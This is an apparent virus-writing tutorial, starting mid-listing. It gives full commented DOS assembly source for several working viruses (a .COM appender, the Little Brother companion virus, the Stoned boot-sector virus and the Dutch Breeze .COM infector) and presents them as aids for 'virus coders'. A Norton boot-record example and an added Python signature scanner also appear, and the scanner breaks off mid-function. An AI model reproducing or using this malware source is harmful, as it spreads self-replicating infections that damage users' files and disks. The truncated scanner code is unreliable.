        mov ah, 40h             ;Write.
        mov cx, 2d              ;Number of bytes.
        lea dx, [bp+longitud]   ;DX<== LONGITUD (length) offset
        int 21h

;Move pointer to end
;-------------------------------------------------------
        mov ax, 4202h           ;Move the write pointer to the
                                ; end of the program.
        mov cx, 0000h
        mov dx, 0000h
        int 21h
        add word ptr [bp+longitud], 3 ;Restore LONGITUD.

;Copy the virus to the program.
;---------------------------------------------------
        pop bx                  ;Restore the handle.
        mov ah, 40h
        mov cx, 190d            ;number of bytes to copy.
        lea dx, [bp+comienzo]   ;Start copying from....
        int 21h

;Close the file after infection
;------------------------------------
        mov ah, 3eh             ;Close file.
        int 21h
;Close only needs the handle in BX, which is still there from the
; write above; DS:DX is not used by this call.

NO_INFECTAR:
;==================RETURN CONTROL TO THE HOST=====================
;Copy the buffer which contains the first 3 bytes of the file into
; memory.
;------------------
        mov cx, 0003h           ;Number of bytes (3).
        mov di, 0100h           ;DI<== offset 100h. Beginning of
                                ; the program in memory.
        lea si, [bp+buffer]     ;SI<== BUFFER offset
        rep movsb               ;Copy.
;What we are doing here is to "fix" the file in memory, since when
; it was infected its first few bytes were overwritten by the
; virus. We reconstruct the program to its original state by
; copying the 3 bytes we stored earlier back to offset 100h.

;Jump to offset 100h
;--------------------------------------------------------
        mov ax, 0100h           ;Address needed to execute the host
        jmp ax
;As we mentioned before, in .COM files the executable code begins
; at offset 100h.
; The information found between 00h and 100h is program data, like
; the DTA for example.
;The main difference between a .COM file and an .EXE is that a .COM
; cannot occupy more than one memory segment (64 KB, minus the 256
; bytes of PSP in front of it). .EXEs can, because DOS can relocate
; them to fit into a number of different segments. Unlike .EXE
; files, .COM files are faithful images of the contents of memory.

;====================DATA AREA===================================
buffer   db 7d dup(0)
longitud db 2 dup(0)
file_inf db '*.COM',0
jump     db 0E9h,0              ;<---- near JMP opcode (shown as the
                                ; character 'é' in the original
                                ; listing)
;(The character '0' is the end of the ASCIIZ string)

start   endp                    ;End of main procedure
codigo  ends                    ;end of code segment
        end comienzo            ;END. Go to COMIENZO
;****************************************************************
; END OF EXAMPLE
;****************************************************************

The following is the source code of some popular viruses which will make life easier for you as a virus coder.

The Brother Virus

Little Brother is a companion virus: it does not modify any program at all. When a program is run through the EXEC call, the resident handler looks at the file name, and if it ends in .EXE it creates a .COM file of the same name containing the virus. Because DOS runs a .COM before an .EXE of the same name, typing the program's name from then on runs the virus first, which then executes the real .EXE and exits with its return code, so the user sees nothing unusual.

cseg    segment
        assume cs:cseg,ds:cseg,es:nothing
        .RADIX 16
FILELEN equ end - begin
oi21    equ end
nameptr equ end+4
;****************************************************************************
;* Install the program!
;****************************************************************************
        org 100h
begin:  cld
        mov sp,300
        mov ax,0044h            ;move program to empty hole
        mov es,ax
        mov di,0100h
        mov si,di
        mov cx,FILELEN
        rep movsb
        mov ds,cx               ;get original int21 vector
        mov si,0084h
        mov di,offset oi21
        mov dx,offset ni21
        lodsw
        cmp ax,dx               ;already installed?
        je cancel
        stosw
        movsw
        push es                 ;set vector to new handler
        pop ds
        mov ax,2521h
        int 21h
cancel: push cs                 ;restore segment registers
        pop ds
        push cs
        pop es
        mov bx,30               ;free memory
        mov ah,4A
        int 21
        mov es,ds:[002C]        ;search filename in environment
        mov di,0
        mov ch,0FFh
        mov al,01
        repnz scasb
        inc di
        mov word ptr [nameptr],di
        mov word ptr [nameptr+2],es
        mov si,offset EXE_txt   ;change extension to .EXE
        call change_ext
        push cs
        pop es
        mov bx,offset param     ;make EXEC param. block
        mov [bx+4],cs
        mov [bx+8],cs
        mov [bx+0C],cs
        lds dx,dword ptr [nameptr]
        mov ax,4B00             ;execute .EXE program
        int 21
        mov ah,4Dh              ;ask return code
        int 21
        mov ah,4Ch              ;exit with same return code
        int 21
;****************************************************************************
;* EXEC parameter block
;****************************************************************************
param   dw 0, 80, ?, 5C, ?, 6C, ?
;****************************************************************************
;* File-extensions
;****************************************************************************
EXE_txt db 'EXE',0
COM_txt db 'COM',0
;****************************************************************************
;* Interrupt handler 24
;****************************************************************************
ni24:   mov al,03
        iret
;****************************************************************************
;* Interrupt handler 21
;****************************************************************************
ni21:   pushf
        push dx
        push bx
        push ax
        push ds
        push es
        cmp ax,4B00h            ;execute ?
        jne exit
doit:   call infect
exit:   pop es
        pop ds
        pop ax
        pop bx
        pop dx
        popf
        jmp dword ptr cs:[oi21] ;call to old int-handler
;****************************************************************************
;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX)
;****************************************************************************
infect: cld
        mov word ptr cs:[nameptr],dx   ;save the ptr to the filename
        mov word ptr cs:[nameptr+2],ds
        push cs
        pop ds
        call searchpoint
        mov si,offset EXE_txt   ;is extension 'EXE'?
        mov cx,3
        rep cmpsb
        jnz return
        mov si,offset COM_txt   ;change extension to COM
        call change_ext
        mov ax,3300h            ;get ctrl-break flag
        int 21
        push dx
        cwd                     ;clear the flag
        inc ax
        push ax
        int 21
        mov ax,3524h            ;get int24 vector
        int 21
        push bx
        push es
        push cs                 ;set int24 vec to new handler
        pop ds
        mov dx,offset ni24
        mov ah,25h
        push ax
        int 21
        lds dx,dword ptr [nameptr] ;create the virus (unique name)
        xor cx,cx
        mov ah,5Bh
        int 21
        jc return1
        xchg bx,ax              ;save handle
        push cs
        pop ds
        mov cx,FILELEN          ;write the virus
        mov dx,offset begin
        mov ah,40h
        int 21
        cmp ax,cx
        pushf
        mov ah,3Eh              ;close the file
        int 21
        popf
        jz return1              ;all bytes written?
        lds dx,dword ptr [nameptr] ;no, delete the virus
        mov ah,41h
        int 21
return1:
        pop ax                  ;restore int24 vector
        pop ds
        pop dx
        int 21
        pop ax                  ;restore ctrl-break flag
        pop dx
        int 21
        mov si,offset EXE_txt   ;change extension to EXE
        call change_ext         ;execute .EXE program
return: ret
;****************************************************************************
;* change the extension of the filename (CS:SI -> ext)
;****************************************************************************
change_ext:
        call searchpoint
        push cs
        pop ds
        movsw
        movsw
        ret
;****************************************************************************
;* search begin of extension
;****************************************************************************
searchpoint:
        les di,dword ptr cs:[nameptr]
        mov ch,0FFh
        mov al,0
        repnz scasb
        sub di,4
        ret
;****************************************************************************
;* Text and Signature
;****************************************************************************
        db 'Little Brother',0
end:
cseg    ends
        end begin

Boot Record program

;Peter Norton
boots   segment 'code'
        public boot
        assume cs:boots
boot    proc far
; 30-byte DOS info -- set up for 1-side, 8-sector
; change as needed for any other format
head:   jmp begin               ; EB 2A 90 as per normal
        db ' Norton '           ; 8-byte system id
        dw 512                  ; sector size in bytes
        db 1                    ; sectors per cluster
        dw 1                    ; reserved sectors
        db
2 ; number of fats dw 64 ; root directory entries dw 320 ; total sectors db 0FEh ; format id dw 1 ; sectors per fat dw 8 ; sectors per track dw 1 ; sides dw 0 ; special hidden sectors ; mysterious but apparently standard 14-byte filler db 14 dup (0) ; carry on with the boot work begin: mov ax,07C0h ; boot record location push ax pop ds mov bx,message_offset ; put offset to message into si mov cx,message_length ; message length from cx continue: mov ah,14 ; write teletype mov al,[bx] push ds push cx push bx int 10h pop bx pop cx pop ds inc bx loop continue mov ah,0 ; read next keyboard character int 16h mov ah,15 ; get video mode int 10h mov ah,0 ; set video mode (clears screen) int 10h int 19h ; re-boot beg_message: db 0Dh,0Ah ; carriage return, line-feed db 0Dh,0Ah db 0Dh,0Ah db 0Dh,0Ah db ' Start your computer with' db 0Dh,0Ah db ' a DOS system diskette.' db 0Dh,0Ah db 0Dh,0Ah db 0Dh,0Ah db ' This is' db 0Dh,0Ah db ' The Norton Utilities' db 0Dh,0Ah db ' Version 3.0' db 0Dh,0Ah db ' from' db 0Dh,0Ah db ' Peter Norton' db 0Dh,0Ah db ' 2210 Wilshire Blvd' db 0Dh,0Ah db ' Santa Monica, CA 90403' db 0Dh,0Ah db 0Dh,0Ah db ' (213) 826-8092' db 0Dh,0Ah db 0Dh,0Ah db 0Dh,0Ah db 0Dh,0Ah db ' Insert a DOS diskette' db 0Dh,0Ah db ' Press any key to start DOS ... ' end_message: ; I put a copyright notice here; you do if you want to ... tail: message_offset equ beg_message - head message_length equ end_message - beg_message filler_amount equ 512 - (tail - head) - 2 db filler_amount dup (0) ; filler db 055h,0AAh ; boot id boot endp boots ends end The STONED VIRUS: LF EQU 0AH CR EQU 0DH XSEG SEGMENT AT 07C0h ORG 5 NEWSEG LABEL FAR XSEG ENDS CODE SEGMENT ASSUME DS:CODE, SS:CODE, CS:CODE, ES:CODE ORG 0 ;***************************************************************************** ; Execution begins here as a boot record. This means that its location and ; CS:IP will be 0000:7C00. The following two JMP instructions accomplish only ; a change in CS:IP so that CS is 07C0. 
The following two JMPs, and the ; segment definition of XSEG above are best not tampered with. ;***************************************************************************** JMP FAR PTR NEWSEG ;This is exactly 5 bytes long. Don't change it ;The above line will jump to here, with a CS of 07C0 and an IP of 5 JMP JPBOOT ;Jump here at boot up time ;***************************************************************************** ; The following offsets: ; D_TYPE ; O_13_O ; O_13_S ; J_AD_O ; J_AD_S ; BT_ADD ; will be used to access their corresponding variables throughout the code. ; They will vary in different parts of the code, since the code relocates ; itself and the values in the segment registers will change. The actual ; variables are defined with a leading underscore, and should not be used. As ; the segment registers, and the offsets used to access them, change in the ; code, the offsets will be redefined with "=" operators. At each point, the ; particular segment register override needed to access the variables will be ; given. ; ; In this area, the variables should be accessed with the CS: segment override. ;****************************************************************************** D_TYPE = $ ;The type of disk we are booting from _D_TYPE DB 0 OLD_13 EQU $ O_13_O = $ ;Old INT 13 vector offset _O_13_O DW ? O_13_S = $ ;Old INT 13 vector segment _O_13_S DW ? JMP_ADR EQU $ J_AD_O = $ ;Offset of the jump to relocated code _J_AD_O DW OFFSET HI_JMP J_AD_S = $ ;Segment of the jump to the relocated code _J_AD_S DW ? BT_ADD = $ ;Fixed address 0:7C00. 
Jump addr to boot sector _BT_ADD DW 7C00h ;Boot address segment DW 0000h ;Boot address offset ;********************************************************** ; The INT 13H vector gets hooked to here ;********************************************************** NEW_13: PUSH DS PUSH AX CMP AH,2 JB REAL13 ;Restore regs & do real INT 13H CMP AH,4 JNB REAL13 ;Restore regs & do real INT 13H ;***************************************************************** ; We only get here for service 2 or 3 - Disk read or write ;***************************************************************** OR DL,DL JNZ REAL13 ;Restore regs & do real INT 13H ;***************************************************************** ; And we only get here if it's happening to drive A: ;***************************************************************** XOR AX,AX MOV DS,AX MOV AL,DS:43FH TEST AL,1 ;Check to see if drive motor is on JNZ REAL13 ;Restore regs & do real INT 13H ;****************************************************************** ; We only get here if the drive motor is on. ;****************************************************************** CALL INFECT ;Try to infect the disk ;****************************************************************** ; Restore regs & do real INT 13H ;****************************************************************** REAL13: POP AX POP DS JMP DWORD PTR CS:OLD_13 ;************************************************************** ;*** See if we can infect the disk *** ;************************************************************** INFECT PROC NEAR PUSH BX PUSH CX PUSH DX PUSH ES PUSH SI PUSH DI MOV SI,4 ;We'll try up to 4 times to read it ;*************************************************************** ; Loop to try reading disk sector ;*************************************************************** RDLOOP: MOV AX,201H ;Read one sector... 
PUSH CS POP ES MOV BX,200H ;...into a space at the end of the code XOR CX,CX MOV DX,CX ;Side 0, drive A INC CX ;Track 0, sector 1 PUSHF CALL DWORD PTR CS:OLD_13 ;Do the old INT 13 JNB RD_OK ;Disk read was OK XOR AX,AX PUSHF CALL DWORD PTR CS:OLD_13 ;Reset disk DEC SI ;Bump the counter JNZ RDLOOP ;Loop to try reading disk sector JMP SHORT QUIT ;Close up and return if all 4 tries failed NOP ;****************************************************************************** ; Here if disk read was OK. We got the boot sector. But is it already infected? ; Find out by comparing the first 4 bytes of the boot sector to the first 4 ; bytes of this code. If they don't match exactly, infect the diskette. ;****************************************************************************** RD_OK: XOR SI,SI MOV DI,200H CLD PUSH CS POP DS LODSW CMP AX,[DI] JNZ HIDEIT ;Hide floppy boot sector in directory LODSW CMP AX,[DI+2] JZ QUIT ;Close up and return ;************************************************************ ; Infect - Hide floppy boot sector in directory ;************************************************************ HIDEIT: MOV AX,301H ;Write 1 sector MOV BX,200H ;From the space at the end of this code MOV CL,3 ;To sector 3 MOV DH,1 ;Side 1 PUSHF CALL DWORD PTR CS:OLD_13 ;Do the old INT 14 JB QUIT ;Close up and return if failed ;****************************************************************** ; If write was sucessful, write this code to the boot sector area ;****************************************************************** MOV AX,301H ;Write 1 sector ... XOR BX,BX ;...of this very code... MOV CL,1 ;...to sector 1... XOR DX,DX ;...of Side 0, drive A PUSHF CALL DWORD PTR CS:OLD_13 ;Do an old INT 13 ; ***NOTE*** no test has been done for a sucessful write. 
;*************************************************************** ; Close up and return ;*************************************************************** QUIT: POP DI POP SI POP ES POP DX POP CX POP BX RET INFECT ENDP ;**************************************************************** ;*** Jump here at boot up time ;**************************************************************** ;***************************************************************************** ; Redefine the variable offsets. The code here executes in the memory area ; used by the normal boot sector. The variable offsets have an assembled ; value of the order 7Cxx. Access them here through the DS: segment override ;***************************************************************************** D_TYPE = 07C00h + OFFSET _D_TYPE O_13_O = 07C00h + OFFSET _O_13_O O_13_S = 07C00h + OFFSET _O_13_S J_AD_O = 07C00h + OFFSET _J_AD_O J_AD_S = 07C00h + OFFSET _J_AD_S BT_ADD = 07C00h + OFFSET _BT_ADD JPBOOT: XOR AX,AX MOV DS,AX ;DS = 0 ;********************************************************* ; Set up a usable stack ;********************************************************* CLI MOV SS,AX ;SS = 0 MOV SP,OFFSET 7C00H ;Position stack at 0000:7C00 STI ;********************************************************* ; Capture the INT 13 vector (BIOS disk I/O) ;********************************************************* MOV AX,DS:4CH ;Offset for old INT 13 vector MOV DS:O_13_O,AX ;Save the offset MOV AX,DS:4EH ;Segment for old INT 13 vector MOV DS:O_13_S,AX ;Save the segment ;***************************************************************************** ; Decrease the memory available to DOS by 2K. Only 1K really seems needed, but ; stealing an odd number of K would result in an odd number shown available ; when a CHKDSK is run. This might be too obvious. Or the programmer may have ; had other plans for the memory. 
;***************************************************************************** MOV AX,DS:413H ;BIOS' internal count of available memory DEC AX DEC AX ;Drop it by 2K ... MOV DS:413H,AX ;...and store it (steal it!!) ;********************************************************* ; Find the segment of the stolen memory ;********************************************************* MOV CL,6 SHL AX,CL MOV ES,AX ;********************************************************* ; Use the segment of the stolen memory area ;********************************************************* MOV DS:J_AD_S,AX ;Becomes part of a JMP address MOV AX,OFFSET NEW_13 MOV DS:4CH,AX ;Offset for new INT 13 MOV DS:4EH,ES ;Segment for new INT 13 ;**************************************************************** ;Copy the code from 07C0:0000 to ES:0000 (the stolen memory area) ;**************************************************************** MOV CX,OFFSET END_BYT ;The size of the code (# of bytes to move) PUSH CS POP DS ;DS = CS XOR SI,SI MOV DI,SI ;All offsets of block move areas are 0 CLD REPZ MOVSB ;Copy each byte of code to the top of memory JMP DWORD PTR CS:JMP_ADR ;JMP to the transferred code... ;************************************************************** ; ...and we'll jump right here, to the transferred code ;************************************************************** ;**************************************************************************** ; Redefine variable offsets again. This code executes at the top of memory, ; and so the exact value of the segment registers depends on how much memory ; is installed. The variable offsets have an assembled value of the order of ; 00xx. 
They are accessed using the CS: segment override ;**************************************************************************** D_TYPE = OFFSET _D_TYPE O_13_O = OFFSET _O_13_O O_13_S = OFFSET _O_13_S J_AD_O = OFFSET _J_AD_O J_AD_S = OFFSET _J_AD_S BT_ADD = OFFSET _BT_ADD HI_JMP: MOV AX,0 INT 13H ;Reset disk system ;********************************************************************** ; This will read one sector into 0000:7C00 (the boot sector address) ;********************************************************************** XOR AX,AX MOV ES,AX MOV AX,201H ;Read one sector MOV BX,OFFSET 7C00H ;To boot sector area: 0000:7C00 CMP BYTE PTR CS:D_TYPE,0 ;Booting from diskette or hard drive? JZ DISKET ;If booting from a diskette ;****************************************************** ; Booting from a hard drive ;****************************************************** MOV CX,7 ;Track 0, sector 7 MOV DX,80H ;Hard drive, side 0 INT 13H ;Go get it ; ***NOTE** There was no check as to wether or not the read was sucessful JMP SHORT BOOTUP ;Go run the real boot sector we've installed NOP ;****************************************************** ; Booting from a diskette ;****************************************************** DISKET: MOV CX,3 ;Track 0, sector 3 MOV DX,100H ;A drive, side 1 (last sector of the directory) INT 13H ;Go get it JB BOOTUP ;If read error, run it anyway.(???) (A prank?) ;**************************************************************** ;Wether or not we print the "Stoned" message depends on the value ; of a byte in the internal clock time -- a fairly random event. 
;**************************************************************** TEST BYTE PTR ES:46CH,7 ;Test a bit in the clock time JNZ GETHDB ;Get Hard drive boot sector ;************************************************************** ; Print the message ;************************************************************** MOV SI,OFFSET S_MSG ;Address of the "stoned message" PUSH CS POP DS ;************************************************************** ; Loop to print individual characters ;************************************************************** PRINT1: LODSB OR AL,AL ;A 00 byte means quit the loop JZ GETHDB ;Get Hard drive boot sector, then ;************************************************************** ; Not done looping. Print another character ;************************************************************** MOV AH,0EH MOV BH,0 INT 10H JMP SHORT PRINT1 ;Print a character on screen ;************************************************************** ; Get Hard drive boot sector ;************************************************************** GETHDB: PUSH CS POP ES MOV AX,201H ;Read one sector... MOV BX,200H ;...to the buffer following this code... MOV CL,1 ;...from sector 1... MOV DX,80H ;...side 0, of the hard drive INT 13H JB BOOTUP ;If error, assume no hard drive ; So go run the floppy boot sector ;*************************************************************************** ; If no read error, then there really must be a hard drive. Infect it. The ; following code uses the same trick above where the first 4 bytes of the ; boot sector are compared to the first 4 bytes of this code. If they don't ; match exactly, then this hard drive isn't infected. 
;*************************************************************************** PUSH CS POP DS MOV SI,200H MOV DI,0 LODSW CMP AX,[DI] JNZ HIDEHD ;Hide real boot sector in hard drive LODSW CMP AX,[DI+2] JNZ HIDEHD ;Hide real boot sector in hard drive ;************************************************************** ; Go run the real boot sector ;************************************************************** BOOTUP: MOV BYTE PTR CS:D_TYPE,0 JMP DWORD PTR CS:BT_ADD ;************************************************************** ; Infect - Hide real boot sector in hard drive ;************************************************************** HIDEHD: MOV BYTE PTR CS:D_TYPE,2 ;Mark this as a hard drive infection MOV AX,301H ;Write i sector... MOV BX,200H ;...from the buffer following this code... MOV CX,7 ;...to track 0, sector 7... MOV DX,80H ;...side 0, of the hard drive... INT 13H ;Do it JB BOOTUP ;Go run the real boot sector if failed ;************************************************** ; Here if the boot sector got written successfully ;*************************************************** PUSH CS POP DS PUSH CS POP ES MOV SI,3BEH ;Offset of disk partition table in the buffer MOV DI,1BEH ;Copy it to the same offset in this code MOV CX,242H ;Strange. Only need to move 42H bytes. This ; won't hurt, and will overwrite the copy of ; the boot sector, maybe giving a bit more ; concealment. REPZ MOVSB ;Move them MOV AX,301H ;Write 1 sector... XOR BX,BX ;...of this code... INC CL ;...into sector 1 INT 13H ; ***NOTE*** no check for a sucessful write JMP BOOTUP ;Now run the real boot sector S_MSG DB 7,'Your PC is now Stoned!',7,CR,LF DB LF ;************************************************************************* ; Just garbage. In one version, this contained an extension of the above ; string, saying "LEGALIZE MARIJUANA". 
Some portions of this text remain ;************************************************************************* DB 0,4CH,45H,47H,41H DB 4CH,49H,53H,45H,67H DB 2,4,68H,2,68H DB 2,0BH,5,67H,2 END_BYT EQU $ ;Used to determine the size of the code. It ; must be less than 1BE, or this code is too ; large to be used to infect hard disks. From ; offset 1BE and above, the hard disk partition ; table will be copied, and anything placed ; there will get clobbered. CODE ENDS END The following is Non-Resident .COM infector which will also infect COMMAND.COM .MODEL TINY Public VirLen,MovLen Code Segment para 'Code' Assume Cs:Code,Ds:Code,Es:Code Org 100h Signature Equ 0CaDah ; Signature of virus is ABCD! Buff1 Equ 0F100h Buff2 Equ Buff1+2 VirLen Equ Offset Einde-Offset Begin MovLen Equ Offset Einde-Offset Mover DTA Equ 0F000h Proggie Equ DTA+1Eh Lenny Equ DTA+1Ah MinLen Equ Virlen ;Minimale lengte te besmetten programma MaxLen Equ 0EF00h ; Maximale lengte te besmetten programma ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; This part will contain the actual virus code, for searching the ; next victim and infection of it. 
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Begin: Jmp Short OverSig ; Sprong naar Oversig vanwege kenmerk DW Signature ; Herkenningsteken virus Oversig: Pushf ;------------------ Push AX ; Alle registers opslaan voor Push BX ; later gebruik van het programma Push CX ; Push DX ; Push DS ; Push ES ; Push SS ; Push SI ; Push DI ;------------------ InfectPart: Mov AX,Sprong ;------------------ Mov Buf1,AX ; Spronggegevens bewaren om Mov BX,Source ; besmette programma te starten Mov Buf2,BX ;------------------ Mov AH,1Ah ; DTA area instellen op Mov DX,DTA ; $DTA area Int 21h ;------------------ Vindeerst: Mov AH,4Eh ; Zoeken naar 1e .COM file in directory Mov Cx,1 ; Lea DX,FindPath ; Int 21h ;------------------ Jnc KijkInfected ; Geen gevonden, goto Afgelopen Jmp Afgelopen ;------------------ KijkInfected: Mov DX,Cs:[Lenny] ;------------------ Cmp DX,MinLen ; Kijken of programmalengte voldoet Jb ZoekNext ; aan de eisen van het virus Cmp DX,MaxLen ; Ja ZoekNext ;------------------ On2: Mov AH,3Dh ; Zo ja , file openen en file handle Mov AL,2 ; opslaan Mov DX,Proggie ; Int 21h ; Mov FH,AX ;------------------ Mov BX,AX ; Mov AH,3Fh ; Lezen 1e 4 bytes van een file met Mov CX,4 ; een mogelijk kenmerk van het virus Mov DX,Buff1 ; Int 21h ;------------------ Sluiten: Mov AH,3Eh ; File weer sluiten Int 21h ;------------------ Mov AX,CS:[Buff2] ; Vergelijken inhoud lokatie Buff1+2 Cmp AX,Signature ; met Signature. Niet gelijk : Zoeken op Jnz Infect ; morgoth virus. 
Als bestand al besmet ZoekNext: Mov AH,4Fh ;------------------ Int 21h ; Zoeken naar volgende .COM file Jnc KijkInfected ; Geen gevonden, goto Afgelopen Jmp Afgelopen ;------------------ Db 'Dutch [Breeze] by Glenn Benton' Infect: Mov DX,Proggie ; beveiliging weghalen Mov AH,43h ; Mov AL,1 ; Xor CX,Cx Int 21h ;------------------ Mov AH,3Dh ; Bestand openen Mov AL,2 ; Mov DX,Proggie ; Int 21h ;------------------ Mov FH,AX ; Opslaan op stack van Mov BX,AX ; datum voor later gebruik Mov AH,57H ; Mov AL,0 ; Int 21h ; Push CX ; Push DX ;------------------ Mov AH,3Fh ; Inlezen van eerste deel van het Mov CX,VirLen+2 ; programma om later terug te Mov DX,Buff1 ; kunnen plaatsen. Int 21h ;------------------ Mov AH,42H ; File Pointer weer naar het Mov AL,2 ; einde van het programma Xor CX,CX ; zetten Xor DX,DX ; Int 21h ;------------------ Xor DX,DX ; Bepalen van de variabele sprongen Add AX,100h ; in het virus (move-routine) Mov Sprong,AX ; Add AX,MovLen ; Mov Source,AX ;------------------ Mov AH,40H ; Move routine bewaren aan Mov DX,Offset Mover ; einde van file Mov CX,MovLen ; Int 21h ;------------------ Mov AH,40H ; Eerste deel programma aan- Mov DX,Buff1 ; voegen na Move routine Mov CX,VirLen ; Int 21h ;------------------ Mov AH,42h ; File Pointer weer naar Mov AL,0 ; het begin van file Xor CX,CX ; sturen Xor DX,DX ; Int 21h ;------------------ Mov AH,40h ; En programma overschrijven Mov DX,Offset Begin ; met code van het virus Mov CX,VirLen ; Int 21h ;------------------ Mov AH,57h ; Datum van aangesproken file Mov AL,1 ; weer herstellen Pop DX ; Pop CX ; Int 21h ;------------------ Mov AH,3Eh ; Sluiten file Int 21h ;------------------ Afgelopen: Mov BX,Buf2 ; Sprongvariabelen weer Mov Source,BX ; op normaal zetten voor Mov AX,Buf1 ; de Move routine Mov Sprong,AX ;------------------ Mov AH,1Ah ; DTA adres weer op normaal Mov Dx,80h ; zetten en naar de Move Int 21h ; routine springen Jmp CS:[Sprong] ;------------------ 
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; All variables are stored in here, like filehandle, date/time, ; search path and various buffers. ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ FH DW 0 FindPath DB '*.COM',0 Buf1 DW 0 Buf2 DW 0 Sprong DW 0 Source DW 0 ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; This will contain the relocator routine, located at the end of ; the ORIGINAL file. This will tranfer the 1st part of the program ; to it's original place. ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Mover: Mov DI,Offset Begin ;------------------ Mov SI,Source ; Verplaatsen van het 1e deel Mov CX,VirLen-1 ; van het programma, wat achter Rep Movsb ;------------------ Pop DI ; Opgeslagen registers weer Pop SI ; terugzetten op originele Pop SS ; waarde en springen naar Pop ES ; het begin van het programma Pop DS ; (waar nu het virus niet meer Pop DX ; staat) Pop CX ; Pop BX ; Pop AX ; Popf ; Mov BX,100h ; Jmp BX ;------------------ ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Only the end of the virus is stored in here. ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Einde db 0 Code Ends End Begin Well after reading this guide you may be in a position to make simple viruses. Ankit Fadia ankit@bol.net.in To receive tutorials on everything you dreamt of written by Ankit Fadia, join his mailing list by sending an email to: programmingforhackers-subscribe@egroups.com My Tutorials Archive: http://hackingtruths.tripod.com
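A defender-side counterpart to the listings above, added here as an example and not part of the original journal: it decodes the 30-byte DOS info block using the field layout of the Norton boot record, checks for the 55AA boot id, applies the same 4-byte prefix test the Stoned code uses to recognise itself, applies the Dutch Breeze offset-2 signature test to a .COM image, and lists .COM/.EXE companion pairs of the kind Little Brother creates. The sample sectors and file names are constructed inline; the function and field names are my own.

```python
import struct

SECTOR_SIZE = 512
BOOT_ID = b"\x55\xaa"  # 'db 055h,0AAh ; boot id' in the Norton listing

# Stoned starts with 'JMP FAR PTR NEWSEG' (07C0:0005), encoded EA 05 00 C0 07.
# Its RD_OK routine compares the first 4 bytes of a boot sector with its own
# first 4 bytes to see whether it is already there; a scanner can use the
# same prefix as a marker.
STONED_PREFIX = bytes.fromhex("ea0500c0")
STONED_MSG = b"Your PC is now Stoned!"

# Dutch Breeze writes 'Jmp Short OverSig' followed by 'DW Signature' (0CADAh)
# and tests the word at offset 2 before infecting a file.
BREEZE_SIGNATURE = 0xCADA
LITTLE_BROTHER_TAG = b"Little Brother"

# Field names (mine) for the info block that follows the 3-byte jump.
BPB_FIELDS = ("system_id", "bytes_per_sector", "sectors_per_cluster",
              "reserved_sectors", "fats", "root_entries", "total_sectors",
              "media_id", "sectors_per_fat", "sectors_per_track", "sides",
              "hidden_sectors")
BPB_FORMAT = "<8sHBHBHHBHHHH"  # 27 bytes at offset 3


def parse_bpb(sector: bytes) -> dict:
    """Decode the 30-byte DOS info block laid out in the Norton boot record."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("a boot sector is exactly 512 bytes")
    bpb = dict(zip(BPB_FIELDS, struct.unpack_from(BPB_FORMAT, sector, 3)))
    bpb["system_id"] = bpb["system_id"].decode("ascii", "replace")
    return bpb


def inspect_boot_sector(sector: bytes) -> list:
    """Return a list of findings; an empty list means nothing suspicious."""
    findings = []
    if sector[510:512] != BOOT_ID:
        findings.append("boot id 55AA missing")
    # A DOS boot record normally opens with a short (EB) or near (E9) jump
    # over the info block ('EB 2A 90 as per normal'); Stoned opens with EA.
    if sector[0] not in (0xEB, 0xE9):
        findings.append("first instruction is not a short/near jump")
    if sector[:4] == STONED_PREFIX:
        findings.append("first 4 bytes match the Stoned loader prefix")
    if STONED_MSG in sector:
        findings.append("Stoned message text present")
    return findings


def inspect_com(data: bytes) -> list:
    """Apply the Dutch Breeze self-check and the Little Brother tag to a .COM image."""
    findings = []
    if len(data) >= 4 and data[0] == 0xEB:
        (word,) = struct.unpack_from("<H", data, 2)
        if word == BREEZE_SIGNATURE:
            findings.append("Dutch Breeze signature word at offset 2")
    if LITTLE_BROTHER_TAG in data:
        findings.append("Little Brother text present")
    return findings


def find_companions(names) -> list:
    """Little Brother is a companion virus: it creates NAME.COM next to NAME.EXE
    so that DOS runs the .COM first. Report every such pair in a listing."""
    upper = {n.upper() for n in names}
    exes = {n[:-4] for n in upper if n.endswith(".EXE")}
    return sorted(base + ".COM" for base in exes if base + ".COM" in upper)


def build_norton_sector() -> bytes:
    """Constructed sample: a clean sector laid out like the Norton boot record."""
    sec = bytearray(SECTOR_SIZE)
    sec[0:3] = b"\xeb\x2a\x90"
    sec[3:11] = b" Norton "
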